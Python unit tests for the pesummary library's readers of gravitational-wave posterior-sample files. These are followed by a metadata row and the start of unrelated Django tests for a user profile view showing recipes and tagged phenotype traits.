self.parameters, self.samples = make_result_file(extension="npy", gw=True)
self.path = os.path.join(".outdir", "test.npy")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWNumpyFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWNumpyFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWNumpyFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWNumpyFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWNumpyFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWNumpyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWNumpyFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWNumpyFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
super(TestGWNumpyFile, self).test_file_format_read(
self.path, "numpy", SingleAnalysisDefault
)
class TestGWDatFile(GWBaseRead):
"""Class to test loading in an dat file with the core Read function
"""
def setup(self):
"""Setup the TestGWDatFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="dat", gw=True)
self.path = os.path.join(".outdir", "test.dat")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWDatFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWDatFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWDatFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWDatFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWDatFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWDatFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWDatFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWDatFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
super(TestGWDatFile, self).test_file_format_read(
self.path, "dat", SingleAnalysisDefault
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWDatFile, self).test_downsample()
class TestGWHDF5File(GWBaseRead):
"""Class to test loading in an HDF5 file with the gw Read function
"""
def setup(self):
"""Setup the TestCoreHDF5File class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="hdf5", gw=True)
self.path = os.path.join(".outdir", "test.h5")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWHDF5File, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWHDF5File, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWHDF5File, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWHDF5File, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWHDF5File, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWHDF5File, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWHDF5File, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWHDF5File, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
super(TestGWHDF5File, self).test_file_format_read(
self.path, "hdf5", SingleAnalysisDefault
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWHDF5File, self).test_downsample()
class TestGWJsonFile(GWBaseRead):
"""Class to test loading in an json file with the gw Read function
"""
def setup(self):
"""Setup the TestGWDatFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="json", gw=True)
self.path = os.path.join(".outdir", "test.json")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWJsonFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWJsonFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWJsonFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWJsonFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWJsonFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWJsonFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWJsonFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWJsonFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
super(TestGWJsonFile, self).test_file_format_read(
self.path, "json", SingleAnalysisDefault
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWJsonFile, self).test_downsample()
class TestGWJsonBilbyFile(GWBaseRead):
"""Class to test loading in a bilby json file with the gw Read function
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="json", gw=True, bilby=True)
self.path = os.path.join(".outdir", "test.json")
self.result = GWRead(self.path, disable_prior=True)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(self.result, pesummary.gw.file.formats.bilby.Bilby)
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(TestGWJsonBilbyFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(TestGWJsonBilbyFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
true = [self.parameters, self.samples]
super(TestGWJsonBilbyFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
true = "bilby=0.5.3:"
super(TestGWJsonBilbyFile, self).test_version(true)
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
true = {"sampler": {
"log_bayes_factor": 0.5,
"log_noise_evidence": 0.1,
"log_evidence": 0.2,
"log_evidence_err": 0.1},
"meta_data": {"time_marginalization": True},
"other": {"likelihood": {"time_marginalization": "True"}}
}
super(TestGWJsonBilbyFile, self).test_extra_kwargs(true)
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: 1. for par in self.parameters}
super(TestGWJsonBilbyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWJsonBilbyFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWJsonBilbyFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.bilby import Bilby
super(TestGWJsonBilbyFile, self).test_file_format_read(self.path, "bilby", Bilby)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWJsonBilbyFile, self).test_downsample()
def test_priors(self, read_function=GWRead):
"""Test that the priors are correctly extracted from the bilby result
file
"""
self.result = GWRead(self.path)
assert "final_mass_source_non_evolved" not in self.result.parameters
for param, prior in self.result.priors["samples"].items():
assert isinstance(prior, np.ndarray)
assert "final_mass_source_non_evolved" in self.result.priors["samples"].keys()
f = read_function(self.path, disable_prior_conversion=True)
assert "final_mass_source_non_evolved" not in f.priors["samples"].keys()
f = read_function(self.path, disable_prior=True)
assert not len(f.priors["samples"])
f = read_function(self.path, nsamples_for_prior=200)
params = list(f.priors["samples"].keys())
assert len(f.priors["samples"][params[0]]) == 200
class TestGWLALInferenceFile(GWBaseRead):
"""Class to test loading in a LALInference file with the gw Read function
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="hdf5", gw=True, lalinference=True)
self.path = os.path.join(".outdir", "test.hdf5")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.lalinference.LALInference)
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(TestGWLALInferenceFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(TestGWLALInferenceFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
true = [self.parameters, self.samples]
super(TestGWLALInferenceFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWLALInferenceFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
true = {"sampler": {"nsamples": 1000}, "meta_data": {}, "other": {}}
super(TestGWLALInferenceFile, self).test_extra_kwargs(true=true)
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
super(TestGWLALInferenceFile, self).test_injection_parameters(None)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWLALInferenceFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWLALInferenceFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.lalinference import LALInference
super(TestGWLALInferenceFile, self).test_file_format_read(
self.path, "lalinference", LALInference
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestGWLALInferenceFile, self).test_downsample()
class TestPublicPycbc(object):
"""Test that data files produced by Nitz et al.
(https://github.com/gwastro/2-ogc) can be read in correctly.
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def _pycbc_check(self, filename):
"""Test a public pycbc posterior samples file
Parameters
----------
filename: str
url of pycbc posterior samples file you wish to download, read and
test
"""
from pesummary.core.fetch import download_and_read_file
from pesummary.gw.file.standard_names import standard_names
import h5py
self.file = download_and_read_file(
filename, read_file=False, outdir=".outdir"
)
self.result = GWRead(self.file, path_to_samples="samples")
samples = self.result.samples_dict
fp = h5py.File(self.file, 'r')
fp_samples = fp["samples"]
for param in fp_samples.keys():
np.testing.assert_almost_equal(
fp_samples[param], samples[standard_names.get(param, param)]
)
fp.close()
def test_2_OGC(self):
"""Test the samples released as part of the 2-OGC catalog
"""
self._pycbc_check(
"https://github.com/gwastro/2-ogc/raw/master/posterior_samples/"
"H1L1V1-EXTRACT_POSTERIOR_150914_09H_50M_45UTC-0-1.hdf"
)
def test_3_OGC(self):
"""Test the samples released as part of the 3-OGC catalog
"""
self._pycbc_check(
"https://github.com/gwastro/3-ogc/raw/master/posterior/"
"GW150914_095045-PYCBC-POSTERIOR-XPHM.hdf"
)
class TestPublicPrincetonO1O2(object):
"""Test that data files produced by Venumadhav et al.
(https://github.com/jroulet/O2_samples) can be read in correctly
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
from pesummary.core.fetch import download_and_read_file
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.file = download_and_read_file(
"https://github.com/jroulet/O2_samples/raw/master/GW150914.npy",
read_file=False, outdir=".outdir"
)
self.result = GWRead(self.file, file_format="princeton")
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_samples_dict(self):
"""
"""
data = np.load(self.file)
samples = self.result.samples_dict
map = {
"mchirp": "chirp_mass", "eta": "symmetric_mass_ratio",
"s1z": "spin_1z", "s2z": "spin_2z", "RA": "ra", "DEC": "dec",
"psi": "psi", "iota": "iota", "vphi": "phase", "tc": "geocent_time",
"DL": "luminosity_distance"
}
columns = [
'mchirp', 'eta', 's1z', 's2z', 'RA', 'DEC', 'psi', 'iota', 'vphi',
'tc', 'DL'
]
for num, param in enumerate(columns):
np.testing.assert_almost_equal(data.T[num], samples[map[param]])
class TestMultiAnalysis(object):
"""Class to test that a file which contains multiple analyses can be read
in appropiately
"""
def setup(self):
"""Setup the TestMultiAnalysis class
"""
from pesummary.utils.samples_dict import MultiAnalysisSamplesDict
from pesummary.io import write
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.data = MultiAnalysisSamplesDict(
{"label1": {
"mass_1": np.random.uniform(20, 100, 10),
"mass_2": np.random.uniform(5, 20, 10),
}, "label2": {
"mass_1": np.random.uniform(20, 100, 10),
"mass_2": np.random.uniform(5, 20, 10)
}}
)
write(
self.data, file_format="sql", filename="multi_analysis.db",
outdir=".outdir", overwrite=True, delete_existing=True
)
self.result = read(
os.path.join(".outdir", "multi_analysis.db"),
add_zero_likelihood=False, remove_row_column="ROW"
)
self.samples_dict = self.result.samples_dict
def teardown(self):
"""Remove all files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_multi_analysis_db(self):
"""Test that an sql database with more than one set of samples can
be read in appropiately
"""
assert sorted(self.samples_dict.keys()) == sorted(self.data.keys())
for key in self.samples_dict.keys():
assert sorted(self.samples_dict[key].keys()) == sorted(
self.data[key].keys()
)
for param in self.samples_dict[key].keys():
np.testing.assert_almost_equal(
self.samples_dict[key][param], self.data[key][param]
)
self.result.generate_all_posterior_samples()
self.samples_dict = self.result.samples_dict
for key in self.samples_dict.keys():
assert "total_mass" in self.samples_dict[key].keys()
np.testing.assert_almost_equal(
self.data[key]["mass_1"] + self.data[key]["mass_2"],
self.samples_dict[key]["total_mass"]
)
class TestSingleAnalysisChangeFormat(object):
"""Test that when changing file format through the 'write' method, the
samples are conserved
"""
def setup(self):
"""Setup the TestChangeFormat class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters = ["log_likelihood", "mass_1", "mass_2"]
self.samples = np.array(
[
np.random.uniform(20, 100, 1000),
np.random.uniform(5, 10, 1000), np.random.uniform(0, 1, 1000)
]
).T
write(
self.parameters, self.samples, outdir=".outdir", filename="test.dat",
overwrite=True
)
self.result = read(os.path.join(".outdir", "test.dat"))
def teardown(self):
"""Remove all files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def save_and_check(
self, file_format, bilby=False, pesummary=False, lalinference=False
):
"""Save the result file and check the contents
"""
if bilby:
filename = "test_bilby.json"
elif pesummary or lalinference:
filename = "test_pesummary.h5"
else:
filename = "test.{}".format(file_format)
self.result.write(
file_format=file_format, outdir=".outdir", filename=filename
)
result = read(os.path.join(".outdir", filename), disable_prior=True)
if pesummary:
assert result.parameters[0] == self.parameters
np.testing.assert_almost_equal(result.samples[0], self.samples)
else:
original = result.parameters
sorted_params = sorted(result.parameters)
idxs = [original.index(i) for i in sorted_params]
assert sorted(result.parameters) == self.parameters
np.testing.assert_almost_equal(
np.array(result.samples)[:, idxs], self.samples
)
def test_to_bilby(self):
"""Test saving to bilby format
"""
self.save_and_check("bilby", bilby=True)
def test_to_hdf5(self):
"""Test saving to hdf5
"""
self.save_and_check("hdf5")
def test_to_json(self):
"""Test saving to json
"""
self.save_and_check("json")
def test_to_sql(self):
"""Test saving to sql
"""
self.save_and_check("sql")
def test_to_pesummary(self):
self.save_and_check("pesummary", pesummary=True)
def test_to_lalinference(self):
self.save_and_check("lalinference", lalinference=True)
class TestMultipleAnalysisChangeFormat(object):
"""Test that when changing file format through the 'write' method, the
samples are conserved
"""
def setup(self):
"""Setup the TestMultiplAnalysisChangeFormat class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters = [
["log_likelihood", "mass_1", "mass_2"],
["chirp_mass", "log_likelihood", "total_mass"]
]
self.samples = np.array(
[np.array(
[
np.random.uniform(20, 100, 1000),
np.random.uniform(5, 10, 1000),
np.random.uniform(0, 1, 1000)
]
).T, np.array(
[
np.random.uniform(20, 100, 1000),
np.random.uniform(5, 10, 1000),
np.random.uniform(0, 1, 1000)
]
).T]
)
write(
self.parameters, self.samples, outdir=".outdir", filename="test.db",
overwrite=True, file_format="sql"
)
self.result = read(os.path.join(".outdir", "test.db"))
def teardown(self):
"""Remove all files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def save_and_check(
self, file_format, bilby=False, pesummary=False, lalinference=False,
multiple_files=True
):
"""Save the result file and check the contents
"""
if bilby:
filename = "test_bilby.json"
elif pesummary or lalinference:
filename = "test_pesummary.h5"
else:
filename = "test.{}".format(file_format)
self.result.write(
file_format=file_format, outdir=".outdir", filename=filename
)
if multiple_files:
files = sorted(glob.glob(".outdir/{}_*.{}".format(*filename.split("."))))
assert len(files) == 2
for num, _file in enumerate(files):
result = read(_file, disable_prior=True)
original = result.parameters
sorted_params = sorted(result.parameters)
idxs = [original.index(i) for i in sorted_params]
assert sorted(result.parameters) == self.parameters[num]
np.testing.assert_almost_equal(
np.array(result.samples)[:, idxs], self.samples[num]
)
else:
result = read(os.path.join(".outdir", filename), disable_prior=True)
original = result.parameters
sorted_params = sorted(result.parameters)
idxs = [original.index(i) for i in sorted_params]
for ii in range(len(original)):
assert result.parameters[ii] == self.parameters[ii]
np.testing.assert_almost_equal(
np.array(result.samples), self.samples
)
def test_to_bilby(self):
"""Test saving to bilby
"""
self.save_and_check("bilby", bilby=True)
def test_to_dat(self):
"""Test saving to dat
"""
self.save_and_check("dat")
def test_to_hdf5(self):
"""Test saving to hdf5
"""
self.save_and_check("hdf5")
def test_to_json(self):
"""Test saving to json
"""
self.save_and_check("json")
def test_to_sql(self):
"""Test saving to sql
"""
self.save_and_check("sql", multiple_files=False)
def test_to_pesummary(self):
self.save_and_check("pesummary", pesummary=True, multiple_files=False)
def test_to_lalinference(self):
self.save_and_check("lalinference", lalinference=True)
def test_add_log_likelihood():
"""Test that zero log likelihood samples are added when the posterior table
does not include likelihood samples
"""
from pesummary.utils.samples_dict import MultiAnalysisSamplesDict
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
parameters = ["a", "b"]
samples = np.array([
np.random.uniform(10, 5, 1000), np.random.uniform(10, 5, 1000)
]).T
write(parameters, samples, filename="test.dat", outdir=".outdir")
f = read(".outdir/test.dat")
_samples_dict = f.samples_dict
assert sorted(f.parameters) == ["a", "b", "log_likelihood"]
np.testing.assert_almost_equal(
_samples_dict["log_likelihood"], np.zeros(1000)
)
np.testing.assert_almost_equal(_samples_dict["a"], samples.T[0])
np.testing.assert_almost_equal(_samples_dict["b"], samples.T[1])
parameters = [["a", "b"], ["c", "d"]]
samples = [
np.array([np.random.uniform(1, 5, 1000), np.random.uniform(1, 2, 1000)]).T,
np.array([np.random.uniform(1, 5, 1000), np.random.uniform(1, 2, 1000)]).T
]
data = MultiAnalysisSamplesDict({
"one": {
"a": np.random.uniform(1, 5, 1000), "b": np.random.uniform(1, 2, 1000)
}, "two": {
"c": np.random.uniform(1, 5, 1000), "d": np.random.uniform(1, 2, 1000)
}
})
write(
data, file_format="pesummary", filename="multi.h5", outdir=".outdir",
)
f = read(".outdir/multi.h5")
_samples_dict = f.samples_dict
np.testing.assert_almost_equal(
_samples_dict["one"]["log_likelihood"], np.zeros(1000)
)
np.testing.assert_almost_equal(
_samples_dict["two"]["log_likelihood"], np.zeros(1000)
)
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
| 34.95333
| 109
| 0.61916
| 8,459
| 71,899
| 5.11538
| 0.044804
| 0.068406
| 0.04042
| 0.029581
| 0.85503
| 0.819047
| 0.784174
| 0.753854
| 0.7325
| 0.692265
| 0
| 0.009106
| 0.27145
| 71,899
| 2,056
| 110
| 34.970331
| 0.81696
| 0.230059
| 0
| 0.533921
| 0
| 0
| 0.061045
| 0.004992
| 0
| 0
| 0
| 0
| 0.078414
| 1
| 0.235242
| false
| 0.004405
| 0.029956
| 0
| 0.287225
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff1ee76b5c410dc1feaf6afdab86093b52eeaa4a
| 31,630
|
py
|
Python
|
profiles/test_views.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | null | null | null |
profiles/test_views.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 3
|
2020-01-02T20:17:06.000Z
|
2020-01-04T21:13:09.000Z
|
profiles/test_views.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 1
|
2021-10-29T22:15:27.000Z
|
2021-10-29T22:15:27.000Z
|
"""Test the functions and classes for views.py."""
from django.urls import reverse
from core.utils import (DCCAnalystLoginTestCase, LoginRequiredTestCase, RecipeSubmitterLoginTestCase,
PhenotypeTaggerLoginTestCase, UserLoginTestCase)
from recipes.factories import HarmonizationRecipeFactory, UnitRecipeFactory
from tags.factories import DCCReviewFactory, TaggedTraitFactory
from tags.models import DCCReview, TaggedTrait
from trait_browser.factories import StudyFactory
class ProfileTest(UserLoginTestCase):
def setUp(self):
super(ProfileTest, self).setUp()
def get_url(self, *args):
return reverse('profiles:profile')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertFalse(context['show_tabs'])
self.assertFalse(context['show_recipes'])
self.assertFalse(context['show_my_tagged'])
self.assertFalse(context['show_study_tagged'])
self.assertNotIn('unit_recipe_table', context)
self.assertNotIn('harmonization_recipe_table', context)
self.assertNotIn('user_taggedtraits', context)
self.assertNotIn('study_taggedtrait_counts', context)
self.assertEqual(context['user'], self.user)
def test_no_tagged_phenotypes(self):
"""Regular user does not see My Tagged Phenotypes."""
response = self.client.get(self.get_url())
context = response.context
self.assertNotContains(response, 'id="user_tagged_phenotypes"')
self.assertNotContains(response, 'id="study_tagged_phenotypes"')
def test_no_recipes(self):
"""Regular user does not see any recipes."""
response = self.client.get(self.get_url())
context = response.context
self.assertFalse(context['show_recipes'])
self.assertNotContains(response, 'id="unitrecipes"')
self.assertNotContains(response, 'id="harmonizationrecipes"')
class DCCAnalystLoginTestCaseProfileTest(DCCAnalystLoginTestCase):
def setUp(self):
super(DCCAnalystLoginTestCaseProfileTest, self).setUp()
def get_url(self, *args):
return reverse('profiles:profile')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertTrue(context['show_tabs'])
self.assertTrue(context['show_recipes'])
self.assertTrue(context['show_my_tagged'])
self.assertFalse(context['show_study_tagged'])
self.assertIn('unit_recipe_table', context)
self.assertEqual(len(context['unit_recipe_table'].rows), 0)
self.assertIn('harmonization_recipe_table', context)
self.assertEqual(len(context['harmonization_recipe_table'].rows), 0)
self.assertIn('user_taggedtraits', context)
self.assertEqual(len(context['user_taggedtraits']), 0)
self.assertNotIn('study_taggedtrait_counts', context)
def test_has_correct_tagged_phenotypes_tabs(self):
"""Staff user does see My Tagged Phenotypes, but not study tagged phenotypes."""
response = self.client.get(self.get_url())
context = response.context
self.assertContains(response, 'id="user_tagged_phenotypes"')
self.assertNotContains(response, 'id="study_tagged_phenotypes"')
def test_has_recipes_tabs(self):
"""Staff user does see any recipes."""
response = self.client.get(self.get_url())
context = response.context
self.assertTrue(context['show_recipes'])
self.assertContains(response, 'id="unitrecipes"')
self.assertContains(response, 'id="harmonizationrecipes"')
def test_has_correct_recipe_count(self):
"""Tables of recipes have the correct number of rows for this user."""
unit_recipes = UnitRecipeFactory.create_batch(10, creator=self.user)
harmonization_recipes = HarmonizationRecipeFactory.create_batch(10, creator=self.user)
other_unit_recipe = UnitRecipeFactory.create()
other_harmonization_recipe = HarmonizationRecipeFactory.create()
response = self.client.get(self.get_url())
context = response.context
self.assertNotIn(other_unit_recipe, context['unit_recipe_table'].data)
self.assertNotIn(other_harmonization_recipe, context['harmonization_recipe_table'].data)
self.assertEqual(len(context['unit_recipe_table'].rows), len(unit_recipes))
self.assertEqual(len(context['harmonization_recipe_table'].rows), len(harmonization_recipes))
def test_my_tagged_variables_correct_empty(self):
"""The list of 'my tagged traits' is correct when the user has no taggedtraits."""
response = self.client.get(self.get_url())
context = response.context
self.assertEqual(context['user_taggedtraits'], [])
def test_my_tagged_variables_correct_count(self):
"""The list of 'my tagged traits' has the correct count of taggedtraits."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_correct_count_with_archived_tagged_trait(self):
"""The list of 'my tagged traits' has the correct count of taggedtraits when there is one archived."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
archived_tagged_trait = TaggedTraitFactory.create(
trait__source_dataset__source_study_version__study=study, creator=self.user, archived=True)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_excludes_trait_tagged_by_other_user(self):
"""The list of 'my tagged traits' does not include traits tagged by another user."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
other_tagged_trait = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(other_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_excludes_archived_tagged_trait(self):
"""The list of 'my tagged traits' does not include an archived tagged trait."""
